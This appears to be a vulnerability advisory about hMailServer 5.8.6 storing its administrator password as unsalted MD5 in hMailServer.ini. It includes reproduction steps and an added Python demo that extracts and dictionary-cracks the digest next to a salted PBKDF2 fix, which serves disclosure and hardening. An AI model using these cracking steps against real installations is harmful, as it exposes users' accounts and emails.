hMailServer
cpe:2.3:a:hmailserver:hmailserver:*:*:*:*:*:*:*
- 5.8.6
- 5.6.9-beta
A vulnerability in hMailServer 5.8.6 allows a local attacker to obtain sensitive information from the installer script 'hMailServerInnoExtension.iss' and the configuration file 'hMailServer.ini'. During installation the administrator password is hashed with MD5 and the digest is written to the INI file. MD5 is a fast hash with no work factor and is unsuitable for password storage: anyone who can read the file can recover the password with an offline dictionary or brute-force attack. According to the report, the recovered password then unlocks the internal database containing user accounts and emails.
Successful exploitation gives unauthorized access to sensitive information, including the recovered password and the contents of the database.
To reproduce: install hMailServer 5.8.6. The installer hashes the administrator password with MD5 and stores the digest in 'hMailServer.ini'. After installation, read the file, crack the hash offline and use the recovered password to decrypt the 'hMailServer.sdf' database file, which exposes the stored user information and emails.
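The following script is an added example written for this page; it is not code from the advisory, the reporter or the hMailServer project. It shows the two local steps the report describes (pull the MD5 digest out of hMailServer.ini, then recover the password by an offline dictionary attack) and, beside them, the salted PBKDF2 storage the installer should have used. The INI fragment and the wordlist are constructed for the demonstration, and the section and key names ([Security] / AdministratorPassword) and the unsalted lowercase-hex MD5 format are assumptions about the real file layout, not facts taken from the page.

```python
"""Added example (not from the advisory or the hMailServer project).

Step 1: parse the administrator password digest out of an hMailServer.ini.
Step 2: recover it with an offline dictionary attack (MD5 has no salt and
        no work factor, so each guess costs a single hash).
Step 3: contrast with salted PBKDF2-HMAC-SHA256, which resists step 2.

Assumptions (not confirmed by the advisory): the digest is stored under
[Security] as AdministratorPassword=<32 hex chars> and equals md5(password).
"""
import configparser
import hashlib
import hmac
import os
import re
from typing import Iterable, List, Optional

# An unsalted MD5 digest written as 32 hexadecimal characters.
MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = ["password", "admin", "hMailServer", "Summer2023!", "letmein"]

# Password used to build the constructed sample INI below.
_DEMO_PASSWORD = "Summer2023!"
SAMPLE_HASH = hashlib.md5(_DEMO_PASSWORD.encode("utf-8")).hexdigest()

# Constructed hMailServer.ini fragment; layout is an assumption.
SAMPLE_INI = f"""[Directories]
ProgramFolder=C:\\Program Files (x86)\\hMailServer
DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database

[Security]
AdministratorPassword={SAMPLE_HASH}

[Database]
Type=MSSQLCE
"""


def extract_admin_hash(ini_text: str) -> Optional[str]:
    """Return the AdministratorPassword value if it looks like an MD5 digest."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    value = cp.get("Security", "AdministratorPassword", fallback=None)
    if value and MD5_HEX.match(value.strip()):
        return value.strip().lower()
    return None


def crack_md5(digest_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one MD5 per guess, no salt to defeat
    precomputation, no iteration count to slow a GPU down."""
    target = digest_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


def audit_ini(ini_text: str) -> List[str]:
    """Configuration check a hardening scan would run on the INI file."""
    findings = []
    if extract_admin_hash(ini_text) is not None:
        findings.append("AdministratorPassword is stored as an unsalted MD5 digest")
    return findings


def hash_password_hardened(password: str, salt: Optional[bytes] = None) -> str:
    """What the installer should store instead: salted PBKDF2-HMAC-SHA256
    with a high iteration count, encoded as pbkdf2_sha256$iters$salt$hash."""
    salt = os.urandom(16) if salt is None else salt
    iterations = 600_000
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_hardened(password: str, stored: str) -> bool:
    """Constant-time verification against the hardened record."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    digest = extract_admin_hash(SAMPLE_INI)
    print("findings:", audit_ini(SAMPLE_INI))
    print("digest:", digest)
    print("recovered password:", crack_md5(digest, WORDLIST))
    record = hash_password_hardened(_DEMO_PASSWORD)
    print("hardened record:", record)
    print("verify ok:", verify_hardened(_DEMO_PASSWORD, record))
```

The same dictionary attack scales to a real wordlist with hashcat mode 0 (raw MD5); the script only shows the mechanism. The hardened variant keeps a random per-password salt and an iteration count in the record, so an attacker who copies the file still has to spend the full work factor per guess per account.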